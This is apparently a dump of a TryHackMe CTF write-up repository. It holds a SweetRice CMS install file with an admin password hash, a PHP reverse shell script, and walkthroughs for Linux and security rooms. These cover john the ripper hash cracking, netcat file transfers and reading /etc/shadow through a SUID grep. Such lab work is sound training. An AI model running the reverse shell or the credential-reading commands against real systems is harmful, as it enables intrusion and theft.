DEFAULT \\'0\\',\n `post_name` varchar(255) NOT NULL,\n `post_cat` varchar(128) NOT NULL,\n `post_slug` varchar(128) NOT NULL,\n `date` int(10) NOT NULL DEFAULT \\'0\\',\n `ip` varchar(39) NOT NULL DEFAULT \\'\\',\n `reply_date` int(10) NOT NULL DEFAULT \\'0\\',\n PRIMARY KEY (`id`)\n) ENGINE=MyISAM DEFAULT CHARSET=utf8;',\n 6 => 'DROP TABLE IF EXISTS `%--%_item_data`;',\n 7 => 'CREATE TABLE `%--%_item_data` (\n `id` int(10) NOT NULL AUTO_INCREMENT,\n `item_id` int(10) NOT NULL,\n `item_type` varchar(255) NOT NULL,\n `data_type` varchar(20) NOT NULL,\n `name` varchar(255) NOT NULL,\n `value` text NOT NULL,\n PRIMARY KEY (`id`),\n KEY `item_id` (`item_id`),\n KEY `item_type` (`item_type`),\n KEY `name` (`name`)\n) ENGINE=MyISAM DEFAULT CHARSET=utf8;',\n 8 => 'DROP TABLE IF EXISTS `%--%_item_plugin`;',\n 9 => 'CREATE TABLE `%--%_item_plugin` (\n `id` int(10) NOT NULL AUTO_INCREMENT,\n `item_id` int(10) NOT NULL,\n `item_type` varchar(255) NOT NULL,\n `plugin` varchar(255) NOT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=MyISAM DEFAULT CHARSET=utf8;',\n 10 => 'DROP TABLE IF EXISTS `%--%_links`;',\n 11 => 'CREATE TABLE `%--%_links` (\n `lid` int(10) NOT NULL AUTO_INCREMENT,\n `request` text NOT NULL,\n `url` text NOT NULL,\n `plugin` varchar(255) NOT NULL,\n PRIMARY KEY (`lid`)\n) ENGINE=MyISAM DEFAULT CHARSET=utf8;',\n 12 => 'DROP TABLE IF EXISTS `%--%_options`;',\n 13 => 'CREATE TABLE `%--%_options` (\n `id` int(10) NOT NULL AUTO_INCREMENT,\n `name` varchar(255) NOT NULL,\n `content` mediumtext NOT NULL,\n `date` int(10) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `name` (`name`)\n) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;',\n 14 => 'INSERT INTO `%--%_options` VALUES(\\'1\\',\\'global_setting\\',\\'a:17:{s:4:\\\\\"name\\\\\";s:25:\\\\\"Lazy Admin's Website\\\\\";s:6:\\\\\"author\\\\\";s:10:\\\\\"Lazy Admin\\\\\";s:5:\\\\\"title\\\\\";s:0:\\\\\"\\\\\";s:8:\\\\\"keywords\\\\\";s:8:\\\\\"Keywords\\\\\";s:11:\\\\\"description\\\\\";s:11:\\\\\"Description\\\\\";s:5:\\\\\"admin\\\\\";s:7:\\\\\"manager\\\\\";s:6:\\\\\"passwd\\\\\";s:32:\\\\\"42f749ade7f9e195bf475f37a44cafcb\\\\\";s:5:\\\\\"close\\\\\";i:1;s:9:\\\\\"close_tip\\\\\";s:454:\\\\\"

Welcome to SweetRice - Thank your for install SweetRice as your website management system.

This site is building now , please come late.

If you are the webmaster,please go to Dashboard -> General -> Website setting

and uncheck the checkbox \\\\\"Site close\\\\\" to open your website.

More help at Tip for Basic CMS SweetRice installed

\\\\\";s:5:\\\\\"cache\\\\\";i:0;s:13:\\\\\"cache_expired\\\\\";i:0;s:10:\\\\\"user_track\\\\\";i:0;s:11:\\\\\"url_rewrite\\\\\";i:0;s:4:\\\\\"logo\\\\\";s:0:\\\\\"\\\\\";s:5:\\\\\"theme\\\\\";s:0:\\\\\"\\\\\";s:4:\\\\\"lang\\\\\";s:9:\\\\\"en-us.php\\\\\";s:11:\\\\\"admin_email\\\\\";N;}\\',\\'1575023409\\');',\n 15 => 'INSERT INTO `%--%_options` VALUES(\\'2\\',\\'categories\\',\\'\\',\\'1575023409\\');',\n 16 => 'INSERT INTO `%--%_options` VALUES(\\'3\\',\\'links\\',\\'\\',\\'1575023409\\');',\n 17 => 'DROP TABLE IF EXISTS `%--%_posts`;',\n 18 => 'CREATE TABLE `%--%_posts` (\n `id` int(10) NOT NULL AUTO_INCREMENT,\n `name` varchar(255) NOT NULL,\n `title` varchar(255) NOT NULL,\n `body` longtext NOT NULL,\n `keyword` varchar(255) NOT NULL DEFAULT \\'\\',\n `tags` text NOT NULL,\n `description` varchar(255) NOT NULL DEFAULT \\'\\',\n `sys_name` varchar(128) NOT NULL,\n `date` int(10) NOT NULL DEFAULT \\'0\\',\n `category` int(10) NOT NULL DEFAULT \\'0\\',\n `in_blog` tinyint(1) NOT NULL,\n `views` int(10) NOT NULL,\n `allow_comment` tinyint(1) NOT NULL DEFAULT \\'1\\',\n `template` varchar(60) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `sys_name` (`sys_name`),\n KEY `date` (`date`)\n) ENGINE=MyISAM DEFAULT CHARSET=utf8;',\n);?>" }, { "path": "LazyAdmin/rshell.php", "content": " array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\n// Set everything to non-blocking\n// Reason: Occsionally reads will block, even though stream_select tells us they won't\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n\t// Check for end of TCP connection\n\tif (feof($sock)) {\n\t\tprintit(\"ERROR: Shell connection terminated\");\n\t\tbreak;\n\t}\n\n\t// Check for end of STDOUT\n\tif (feof($pipes[1])) {\n\t\tprintit(\"ERROR: Shell process terminated\");\n\t\tbreak;\n\t}\n\n\t// Wait until a command is end down $sock, or some\n\t// command output is available on STDOUT or STDERR\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\t// If we can read from the TCP socket, send\n\t// data to process's STDIN\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit(\"SOCK READ\");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit(\"SOCK: $input\");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\t// If we can read from the process's STDOUT\n\t// send data down tcp connection\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit(\"STDOUT READ\");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit(\"STDOUT: $input\");\n\t\tfwrite($sock, $input);\n\t}\n\n\t// If we can read from the process's STDERR\n\t// send data down tcp connection\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit(\"STDERR READ\");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit(\"STDERR: $input\");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\n// Like print, but does nothing if we've daemonised ourself\n// (I can't figure out how to redirect STDOUT like a proper daemon)\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint \"$string\\n\";\n\t}\n}\n\n?>\n" }, { "path": "Linux-Challenges/README.md", "content": "# Linux Challenges\n\n- How many visible files can you see in garrys home directory?\n\n\t- `ssh garry@` and enter the password.\n\t- `ls`\n\t- `*`\n\n- What is flag 1?\n\n\t- `ls`\n\t- `cat flag1.txt`\n\t- `**********************************`\n\n- What is flag 2?\n\n\t- `su bob` and enter the password (shown in flag1.txt).\n\t- `ls`\n\t- `cd ../bob`\n\t- `ls`\n\t- `cat flag2.txt`\n\t- `**********************************`\n\n- Flag 3 is located where bob's bash history gets stored.\n\n\t- `cat .bash_history`\n\t- `*********************************`\n\n- Flag 4 is located where cron jobs are created.\n\n\t- `crontab -l`\n\t- `*********************************`\n\n- Find and retrieve flag 5.\n\n\t- `find / | grep flag5`\n\t- `cat /lib/terminfo/E/flag5.txt`\n\t- `*********************************`\n\n- \"Grep\" through flag 6 and find the flag. The first 2 characters of the flag is c9.\n\n\t- `find / | grep flag6.txt`\n\t- `cat /home/flag6.txt`\n\t- `cat /home/flag6.txt | grep c9`\n\t- `*********************************`\n\n- Look at the systems processes. What is flag 7.\n\n\t- `ps -aef`\n\t- `********************************`\n\n- De-compress and get flag 8.\n\n\t- `find / | grep flag8`\n\t- `tar -xzvf /home/bob/flag8.tar.gz`\n\t- `cat flag8.txt`\n\t- `********************************`\n\n- By look in your hosts file, locate and retrieve flag 9.\n\n\t- `cat /etc/hosts`\n\t- `*******************************`\n\n- Find all other users on the system. What is flag 10.\n\n\t- `cat /etc/passwd`\n\t- `*******************************`\n\n- Run the command flag11. Locate where your command alias are stored and get flag 11.\n\n\t- `flag11`\n\t- `cat .bashrc`\n\t- `*******************************`\n\n- Flag12 is located were MOTD's are usually found on an Ubuntu OS. What is flag12?\n\n\t- `cat /etc/update-motd.d/00-header`\n\t- `********************************`\n\n- Find the difference between two script files to find flag 13.\n\n\t- `cd flag13`\n\t- `diff script1 script2`\n\t- `*******************************`\n\n- Where on the file system are logs typically stored? Find flag 14.\n\n\t- `ls /var/log | grep flag`\n\t- `cat /var/log/flagfourteen.txt`\n\t- `*******************************`\n\n- Can you find information about the system, such as the kernel version etc. Find flag 15.\n\n\t- `cat /etc/*release`\n\t- `*******************************`\n\n- Flag 16 lies within another system mount.\n\n\t- `ls /media/f/l/a/g/1/6/is/`\n\t- `ls`\n\t- `*******************************`\n\n- Login to alice's account and get flag 17. Her password is TryHackMe123\n\n\t- `su alice` and enter `TryHackMe123`.\n\t- `cd ../alice`\n\t- `cat flag17`\n\t- `*******************************`\n\n- Find the hidden flag 18.\n\n\t- `ls -alh`\n\t- `cat .flag18`\n\t- `******************************`\n\n- Read the 2345th line of the file that contains flag 19.\n\n\t- `head -n 2345 flag19`\n\t- `******************************`\n\n- Find and retrieve flag 20.\n\n\t- `ls`\n\t- `cat flag20`\n\t- `cat flag20 | base64 -d`\n\t- `******************************`\n\n- Inspect the flag21.php file. Find the flag.\n\n\t- `find / | grep flag21`\n\t- `cd ../bob`\n\t- `cat flag21.php`\n\t- `vim flag21.php`\n\t- `:q`\n\t- `********`\n\n- Locate and read flag 22. Its represented as hex.\n\n\t- `find / | grep flag21`\n\t- `cd /home/alice/`\n\t- `cat flag22`\n\t- Go to [CyberChef](https://gchq.github.io/CyberChef)\n\t- Copy that content as input and from hex as recipe.\n\t- `*******************************`\n\n- Locate, read and reverse flag 23.\n\n\t- `find / | grep flag23`\n\t- `cat flag23`\n\t- `rev flag23`\n\t- `*******************************`\n\n- Analyse the flag 24 compiled C program. Find a command that might reveal human readable strings when looking in the machine code code.\n\n\t- `find / | grep flag24`\n\t- `cd /home/garry`\n\t- `cat flag24`\n\t- `strings flag24`\n\t- `**************`\n\n- Flag 25 does not exist.\n\n\t no answer needed\n\n- Find flag 26 by searching the all files for a string that begins with 4bceb and is 32 characters long. \n\n\t- `find / -xdev -type f -print0 2>/dev/null | xargs -0 grep -E '^[a-z0-9]{32}$' 2>/dev/null`\n\t- `******************************`\n\n- Locate and retrieve flag 27, which is owned by the root user.\n\n\t- `find / | grep flag27`\n\t- `sudo cat /home/flag27`\n\t- `******************************`\n\n- Whats the linux kernel version?\n\n\t- `uname -a`\n\t- `**************`\n\n- Find the file called flag 29 and do the following operations on it:\n\n\t1. Remove all spaces in file.\n\t2. Remove all new line spaces.\n \t3. Split by comma and get the last element in the split.\n\n\t- `su garry` and garry's password.\n\t- `find / | grep flag29`\n\t- `cat flag29 | tr -d \" \" > nospaces`\n\t- `cat nospaces | tr -d '/n' > nolines`\n\t- `cat nolines` and get the string after the last comma.\n\t- `**********************`\n\n- Use curl to find flag 30.\n\n\t- `curl localhost`\n\t- `****************************`\n\n- Flag 31 is a MySQL database name.\n\n\t- `mysql -u root -p` and enter `hello`\n\t- `show databases;`\n\t- `******************************`\n\n- Bonus flag question, get data out of the table from the database you found above!\n\n\t- `use database_`\n\t- `show tables;`\n\t- `select * from flags;`\n\t- `******************************`\n\n- Using SCP, FileZilla or another FTP client download flag32.mp3 to reveal flag 32.\n\n\t- `scp -r alice@:flag32.mp3 flag32.mp3`\n\t- I had trouble with audio file. `tryhackme1**7`\n\n- Flag 33 is located where your personal $PATH's are stored.\n\n\t- `su bob` and enter password\n\t- `cd ~`\n\t- `cat .profile`\n\t- `******************************`\n\n- Switch your account back to bob. Using system variables, what is flag34?\n\n\t- `echo $flag34`\n\t- `*****************************`\n\n- Look at all groups created on the system. What is flag 35?\n\n\t- `getent group`\n\t- `*********`\n\n- Find the user which is apart of the \"hacker\" group and read flag 36.\n\n\t- `getent group hacker`\n\t- `cat /etc/flag36`\n\t- `****************************`\n\n- Well done! You've completed the LinuxCTF room!\n\n\t no answer needed\n\n\n\n\n" }, { "path": "Linux-Fundamentals/Linux-Fundamentals-Part-1/README.md", "content": "# Linux Fundamentals - Part 1\n\n- Read the above\n\n\t no answer needed\n\n- Deploy the machine attached to this task!\nNOTE: If you have a machine open in the Welcome room (or any other room) please go to that room and terminate it before deploying the machine attached to this task. These machines are not the same, and only the one attached to this room will work.\n\n\tno answer needed\n\n- Read the above\n\n\t no answer needed\n\n- Read the above\n\n\t- `ssh shiba1@`\n\t- `yes` and insert password `shiba1`\n\t- When you're into the nootnoot machine as user shiba1 (the shell starts with `shiba1@nootnoot`) type `echo hello`\n\n- How would you output hello without a newline?\n\n\t- `echo -n hello`\n\n- What flag outputs all entries?\n\n\t- `-a`\n\n- What flag outputs things in a \"long list\" format?\n\n\t- `-l`\n\n- What flag numbers all output lines?\n\n\t- `-n`\n\n- Read the above!\n\n\t no answer needed\n\n- How would you run a binary called hello using the directory shortcut . ?\n\n\t- `./hello`\n\n- How would you run a binary called hello in your home directory using the shortcut ~ ?\n\n\t- `~/hello`\n\n- How would you run a binary called hello in the previous directory using the shortcut .. ?\n\n\t- `../hello`\n\n- What's the password for shiba2?\n\n\t- `touch noot.txt`\n\t- `./shiba1`\n\t- `pinguftw`\n\n- How do you specify which shell is used when you login?\n\n\t- `-s`\n\n- Join the Linux Fundamentals 2 room, and continue your learning journey: https://tryhackme.com/room/linux2\n\n\t no answer needed\n" }, { "path": "Linux-Fundamentals/Linux-Fundamentals-Part-2/README.md", "content": "# Linux Fundamentals - Part 2\n\n- Read the above.\n\n\t no answer needed\n\n- Deploy the machine attached to this task!\nNOTE: If you have a machine open in the Welcome room (or any other room) please go to that room and terminate it before deploying the machine attached to this task. These machines are not the same, and only the one attached to this room will work.\n\n\tno answer needed\n\n- Read the above\n\n\t no answer needed\n\n- SSH into the server\n\n\t- `ssh shiba2@`\n\t- Type `yes` and enter the password `pinguftw`\n\n- Read the above\n\n\t no answer needed\n\n- Read the above\n\n\t no answer needed\n\n- How would you set nootnoot equal to 1111?\n\n\t- `export nootnoot=1111`\n\n- What is the value of the home environment variable?\n\n\t- `echo $HOME`\n\t- `/home/shiba2`\n\n- Read the above!\n\n\t no answer needed\n\n- Read the above.\n\n\t no answer needed\n\n- What is shiba3's password?\n\n\t- `export test1234=$USER`\n\t- `./shiba2`\n\t- `happynoot******`\n\n- Read the above.\n\n\t no answer needed\n\n- Read the above!\n\n\t no answer needed\n\n- What permissions mean the user can read the file, the group can read and write to the file, and no one else can read, write or execute the file?\n\n\t- `460`\n\n- What permissions mean the user can read, write, and execute the file, the group can read, write, and execute the file, and everyone else can read, write, and execute the file.\n\n\t- `777`\n\n- How would you change the owner of file to paradox?\n\n\t- `chown paradox file`\n\n- What about the owner and the group of file to paradox?\n\n\t- `chown paradox:paradox file`\n\n- What flag allows you to operate on every file in the directory at once?\n\n\t- `-r`\n\n- What flag deletes every file in a directory?\n\n\t- `-r`\n\n- How do you suppress all warning prompts?\n\n\t- `-f`\n\n- How would you move file to /tmp\n\n\t- `mv file /tmp`\n\n- How would you output twenty to a file called test\n\n\t- `echo twenty > test`\n\n- Read the above\n\n\t no answer needed\n\n- Join the Linux Fundamentals 3 room, and finish learning Linux: https://tryhackme.com/room/linux3\n\n\t no answer needed\n\n\n" }, { "path": "Linux-Fundamentals/Linux-Fundamentals-Part-3/README.md", "content": "# Linux Fundamentals - Part 3\n\n- Read the above\n\n\t no answer needed\n\n- Deploy the machine attached to this task!\nNOTE: If you have a machine open in the Welcome room (or any other room) please go to that room and terminate it before deploying the machine attached to this task. These machines are not the same, and only the one attached to this room will work.\n\n no answer needed\n \n - `ssh shiba3@`\n - Type `yes` and enter the password `happynootnoises`\n\n- Using relative paths, how would you cd to your home directory.\n\n\t- `cd ~`\n\n- Using absolute paths how would you make a directory called test in /tmp\n\n\t- `mkdir /tmp/test`\n\n- How would I link /home/test/testfile to /tmp/test?\n\n\t- `ln /home/test/testfile /tmp/test`\n\n- How do you find files that have specific permissions?\n\n\t- `-perm`\n\n- How would you find all the files in /home\n\n\t- `find /home`\n\n- How would you find all the files owned by paradox on the whole system\n\n\t- `find / -user paradox`\n\n- What flag lists line numbers for every string found?\n\n\t- `-n`\n\n- How would I search for the string boop in the file aaaa in the directory /tmp\n\n\t- `grep boop /tmp/aaaa`\n\n- What is shiba4's password\n\n\t- `mkdir test && touch test/test1234`\n\t- `find / -name shiba4 | grep shiba4 | grep shiba4`\n\t- `/opt/secret/shiba4`\n\t- `test1234`\n\t- `su shiba4` and enter password `test1234`\n\n- Read the above\n\n\tno answer needed\n\n- How do you specify which user you want to run a command as.\n\n\t- `-u`\n\n- How would I run whoami as user jen?\n\n\t- `sudo -u jen whoami`\n\n- How do you list your current sudo privileges(what commands you can run, who you can run them as etc.)\n\n\t- `-l`\n\n- How would I add the user test to the group test?\n\n\t- `sudo usermod -a -G test test`\n\n- Read the above\n\n\t no answer needed\n\n- Read the above.\n\n\t no answer needed\n\n- Read the above\n\n\t no answer needed\n\n- Read the above\n\n\t no answer needed\n\n- Read the above!\n\n\t no answer needed\n\n\n" }, { "path": "Linux-Strength-Training/README.md", "content": "# Linux Strength Training\n\n- I have read and understood\n\n\t no answer needed\n\n- What is the correct option for finding files based on group\n\n\t- `-group`\n\n- What is format for finding a file with the user named Francis and with a size of 52 kilobytes in the directory /home/francis/\n\n\t- `find /home/francis -type f -user francis -size 52K`\n\n- SSH as topson using his password topson. Go to the /home/topson/chatlogs directory and type the following: grep -iRl 'keyword'. What is the name of the file that you found using this command?\n\n\t- `ssh topson@`\n\t- Enter the password `topson`.\t\n\t- `cd /home/topson/chatlogs`\n\t- `grep -iRl 'keyword'`\n\t- `2019-10-11`\n\n- Type: less [filename] to open the file. Then, before anything, type / before typing: keyword followed by [ENTER]. Notice how that allowed us to search for the first instance of that word in the entire document. For much larger documents this can be useful and if there are many more instances of that word in the document, we would be able to hit enter again to find the next instance in the document.\n\n\t no answer needed\n\n- What are the characters subsequent to the word you found?\n\n\t- `ttitor`\n\n- Read the file named 'ReadMeIfStuck.txt'. What is the Flag?\n\n\t- `cd ~`\n\t- `cat ReadMeIfStuck.txt`\n\t- `find ~ -type f -name HINT`\n\t- `cat $(find ~ -type f -name HINT)`\n\t- `find ~ -type f | grep telephone`\n\t- `cat /home/topson/corperateFiles/xch/telephone numbers/readME.txt`\n\t- `find ~/workflows -type f -newermt 2016-09-11 ! -newermt 2016-09-13`\n\t- `cat ~/workflows/xft/eBQRhHvx`\n\t- `****{****************}`\n\n- Hypothetically, you find yourself in a directory with many files and want to move all these files to the directory of /home/francis/logs. What is the correct command to do this?\n\n\t- `mv * /home/francis/logs`\n\n- Hypothetically, you want to transfer a file from your /home/james/Desktop/ with the name script.py to the remote machine (192.168.10.5) directory of /home/john/scripts using the username of john. What would be the full command to do this?\n\n\t- `scp /home/james/Desktop/script.py john@192.168.10.5:/home/john/scripts`\n\n- How would you rename a folder named -logs to -newlogs\n\n\t- `mv -logs -newlogs`\n\n- How would you copy the file named encryption keys to the directory of /home/john/logs\n\n\t- `mv \"encryption keys\" /home/john/logs`\n\n- Find a file named `readME_hint.txt` inside topson's directory and read it. Using the instructions it gives you, get the second flag.\n\n\t- `find / -type f | grep readME_hint.txt`\n\t- `cat /home/topson/corperateFiles/RecordsFinances/readME_hint.txt`\n\t- `find ~ -type f | grep MoveMe.txt`\n\t- `find ~ -type d | grep march`\n\t- `mv /home/topson/corperateFiles/RecordsFinances/-MoveMe.txt \"/home/topson/corperateFiles/RecordsFinances/-march folder\"`\n\t- `cd \"/home/topson/corperateFiles/RecordsFinances/-march folder\"`\n\t- `ls`\n\t- `./-runME.sh`\n\t- `****{****************}`\n\n- Download the hash file attached to this task and attempt to crack the MD5 hash. What is the password?\n\n\t- Simply google the hash.\n\t- `*********`\n\n- SSH as sarah using: sarah@[MACHINE:IP] and use the password: rainbowtree1230x\nWhat is the hash type stored in the file hashA.txt\n\n\t- `ssh sarah@` and enter the password.\n\t- ` uname -a;pwd;ls -lah`\n\t- `find ~ -type f | grep hashA.txt`\n\t- `cat hashA.txt | hash-identifier`\n\t- `MD4`\n\n- Crack hashA.txt using john the ripper, what is the password?\n\t\n\t- `john --format=raw-md4 --wordlist=/usr/share/wordlists/rockyou.txt hashA.txt`\n\t- `*****`\n\n- What is the hash type stored in the file hashB.txt\n\n\t- `find ~ -type f | grep hashB.txt`\n\t- `cat /home/sarah/oldLogs/settings/craft/hashB.txt`\n\t- `cat hashB.txt | hash-identifier`\n\t- `SHA-1`\n\n- Find a wordlist with the file extention of '.mnf' and use it to crack the hash with the filename hashC.txt. What is the password?\n\n\t- `find ~ -type f | grep .mnf`\n\t- `/home/sarah/system AB/db/ww.mnf`\n\t- `find ~ -type f | grep hashC.txt`\n\t- `cat \"/home/sarah/system AB/server_mail/hashC.txt\"`\n\t- `cat hash3.txt | hash-identifier`\n\t- On target `nc -lnvp 1234 < \"/home/sarah/system AB/db/ww.mnf\"`\n\t- On your machine `nc 1234 > ab.mnf`\n\t- `john --format=raw-sha256 --wordlist=ab.mnf hash3.txt`\n\t- `******************`\n\n- Crack hashB.txt using john the ripper, what is the password?\n\n\t- `john --format=raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt`\n\t- `*******`\n\n- what is the name of the tool which allows us to decode base64 strings?\n\n\t- `base64`\n\n- find a file called encoded.txt. What is the special answer?\n\n\t- `find ~ -type f | grep encoded.txt`\n\t- `cat \"/home/sarah/system AB/managed/encoded.txt\" | base64 -d > decoded.txt`\n\t- `head decoded.txt`\n\t- `cat decoded.txt | grep special`\n\t- You will find `special: the answer is in a file called ent.txt, find it`.\n\t- `find ~ -type f | grep ent.txt`\n\t- `cat $(find ~ -type f | grep ent.txt)`\n\t- Google for that hash.\n\t- `****`\n\n- Now try it for yourself. Make a random text file and enter some readable sentences in there before encrypting and decrypting it as illustrated above.\n\n\t no answer needed\n\n- You wish to encrypt a file called `history_logs.txt` using the AES-128 scheme. What is the full command to do this?\n\n\t- `pgp --cipher-algo AES-128 --symmetric history_logs.txt`\n\n- What is the command to decrypt the file you just encrypted?\n\n\t- `pgp history_logs.txt.pgp`\n\n- Find an encrypted file called layer4.txt, its password is bob. Use this to locate the flag. What is the flag?\n\n\t- `find ~ -type f | layer4.txt`\n\t- On target `nc -lnvp 1234 < layer4.txt`\n\t- On your machine `nc 1234 > layer4.txt`\n\t- `pgp layer4.txt` and enter the password.\n\t- `cat layer4.txt.decrypted`. This for layer3.txt and layer2.txt. Then you will find an hash.\n\t- `hash-identifier` says not found.\n\t- `cat layer2.txt.decrypted | base64 -d` It's because it's base64. Ok.\n\t- Same as before for layer1.txt\n\t- `Flag{*****************}`\n\n- Now try it yourself! Encrypt a file and use a common password contained in the wordlist you wish to use. Follow the instructions above to decrypt as if you are a hacker. If it worked, well done.\n\n\t no answer needed\n\n- Find an encrypted file called personal.txt.gpg and find a wordlist called data.txt. Use tac to reverse the wordlist before brute-forcing it against the encrypted file. What is the the password to the encrypted file?\n\n\t- `find ~ -type f | grep personal.txt.gpg`\n\t- `nc -lnvp 1234 < personal.txt.gpg`\n\t- `nc 1234 > personal.txt.gpg`\n\t- This also for `data.txt`\n\t- `tac data.txt > reversed_data.txt`\n\t- Then, `gpg2john personal.txt.gpg > personal`\n\t- `john --format=gpg --wordlist=reversed_data.txt personal`\n\t- `***************`\n\n- What is written in this now decrypted file?\n\n\t- `getting stronger in linux`\n\n- Find a file called employees.sql and read the SQL database. (Sarah and Sameer can log both into mysql using the password: password). Find the flag contained in one of the tables. What is the flag?\n\n\t- `find ~ -type f | grep employees.sql`\n\t- `cd ~/serverLx`\n\t- `mysql -u sarah -p` and enter password `password`.\n\t- `source employees.sql`\n\t- `use employees;`\n\t- `show tables;`\n\t- `describe employees;`\n\t- `select * from employees where first_name = \"Lobel\";`\n\t- `Flag{********}`\n\n- Go to the /home/shared/chatlogs directory and read the first chat log named: LpnQ. Use this to help you to proceed to the next task.\n\n\t no answer needed\n\n- What is Sameer's SSH password?\n\n\t- Tried to figure out something in the `LpnQ` file.\n\t- Then I did `ls -al` ad I saw all the real chat files have little size in respect to the others, so I just read all those.\n\t- Nice chat:\n\t~~~\n\t(2020-08-13) Sarah: Michael, I have been having trouble accessing the sql database back-up copy made today. Sameer gave me the password, but it just will not work?\n\n\t(2020-08-13) Michael: Ah, yes. I remember, the security engineer was testing out a new automated software for creating sql database backups. He must have configured it to encrypt the backups with a different password.\n\n\t(2020-08-13) Sarah: So how can I get a hold of it?\n\n\t(2020-08-13) Michael: Good question. From what I remember the test program utilised a configuration file around 50mb. It is located inside the home/shared/sql/conf directory. This configuration file contained the directory location of a wordlist it used to randomly select a password from for encrypting the sql back-up copies with. \n\n\t(2020-08-13) Sarah: I do not really understand the last part?\n\n\t(2020-08-13) Michael: once you find the configuration file and consequently the wordlist directory, visit it. One of those wordlists must contain the password it used for the testing. All I remember is that the password began with ebq. You will need Sameer’s account. His SSH password is: ************************. \n\n\t(2020-08-13) Sarah: Thank you, I will try to find it.\n\t~~~\n\t- `*************************`\n\n- What is the password for the sql database back-up copy\n\n\t- `cat $(find /home/shared/sql/conf -type f -size +40M) | grep dir`\n\t- You will find a base64 encoded string.\n\t- `echo \"aG9tZS9zYW1lZXIvSGlzdG9yeSB********************************go=\" | base64 -d`\n\t- `home/sameer/History LB/labmind/latestBuild/configBDB`\n\t- `ssh Sameer@` and enter password.\n\t- `cd` into that directory above\n\t- `cat * | grep ebq`\n\t- Try `pgp 2020-08-13.zip.gpg` with all the password you see.\n\t- `*******`\n\n- Find the SSH password of the user James. What is the password?\n\n\t- `mysql -u sarah -p` and enter the password\n\t- `source sakila-mv-data.sql`\n\t- `show databases;`\n\t- `use employees;`\n\t- `describe employyes;`\n\t- `select * from employees where first_name LIKE \"james\";`\n\t- `************`\n\n- SSH as james and change the user to root?\n\n\t no answer needed\n\n- What is the root flag?\n\n\t- `cat /root/root.txt`\n\t- `Flag{*****************}`\n\n\n\n\n\n## NOW YOU ARE LINUX STRONGER!!!\n" }, { "path": "Linux:-Local-Enumeration/README.md", "content": "# Linux: Local Enumeration\n\n- Let's go!\n\n\t no answer needed\n\n- How would you execute /bin/bash with perl?\n\n\t- `perl -e 'exec \"/bin/bash\";'`\n\n- Where can you usually find the `id_rsa` file? (User = user)\n\n\t- `/home/user/.ssh/id_rsa`\n\n- Is there an `id_rsa` file on the box? (yay/nay)\n\n\t- `nay`\n\n- How would you print machine hardware name only?\n\n\t- `uname -m`\n\n- Where can you find bash history?\n\n\t- `~/.bash_history`\n\n- What's the flag?\n\n\t- `********************`\n\n- Can you read /etc/passwd on the box? (yay/nay)\n\n\t- `yay`\n\n- What's the password you found?\n\n\t- `find / -name *.bak -type f 2>/dev/null`\n\t- `cat /var/opt/passwords.bak`\n\t- `************`\n\n- Did you find a flag?\n\n\t- `find / -type f -name \"flag.conf\" 2>/dev/null`\n\t- `cat /etc/sysconf/flag.conf`\n\t- `**************`\n\n- Which SUID binary has a way to escalate your privileges on the box?\n\n\t- `find / -perm -4000 2>/dev/null`\n\t- `grep`\n\n- What's the payload you can use to read /etc/shadow with this SUID?\n\n\t- `grep '' /etc/shadow`\n\n- Try using those commands on your system! \n\n\t no answer needed\n\n- Got it!\n\n\t no answer needed\n\n- Read the above and consider completing mentioned rooms.\n\n\t no answer needed\n\n\n\n" }, { "path": "MAL:-REMnux-The_Redux/README.md", "content": "# MAL: REMnux - The Redux\n\n- I'm all buckled up and ready to get started.\n\n\t no answer needed\n\n- I've deployed my instance\n\n\t no answer needed\n\n- How many types of categories of \"Suspicious elements\" are there in \"notsuspicious.pdf\"\n\n\t- `3`\n\n- Use peepdf to extract the javascript from \"notsuspicious.pdf\". What is the flag?\n\n\t- `THM{Luckily_This_**************+*}`\n\n- How many types of categories of \"Suspicious elements\" are there in \"advert.pdf\"\n\n\t- `6`\n\n- Now use peepdf to extract the javascript from \"advert.pdf\". What is the value of \"cName\"?\n\n\t- `not************`\n\n- What is the name of the Macro for \"DefinitelyALegitInvoice.doc\"\n\n\t- `****Legit`\n\n- What is the URL the Macro in \"Taxes2020.doc\" would try to launch?\n\n\t- `http://tryhackme.com/*************.**`\n\n- What is the highest file entropy a file can have?\n\n\t- `8`\n\n- What is the lowest file entropy a file can have?\n\n\t- `0`\n\n- Name a common packer that can be used for applications?\n\n\t- `UPX`\n\n- Pretty interesting stuff!\n\n\t no answer needed\n\n- Fin.\n\n\t no answer needed\n\n- I'm curious to read up some more!\n\n\t no answer needed\n\n\n" }, { "path": "NIS-Linux_Part_I/README.md", "content": "# NIS - Linux Part I\n\n- What is shiba3's password?\n\n\t- `ssh chad@` and enter password.\n\t- See [Linux Fundamentals](https://github.com/edoardottt/tryhackme-ctf/tree/main/Linux-Fundamentals)\n\t- `**************`\n\n- What is shiba4's password?\n\n\t- See [Linux 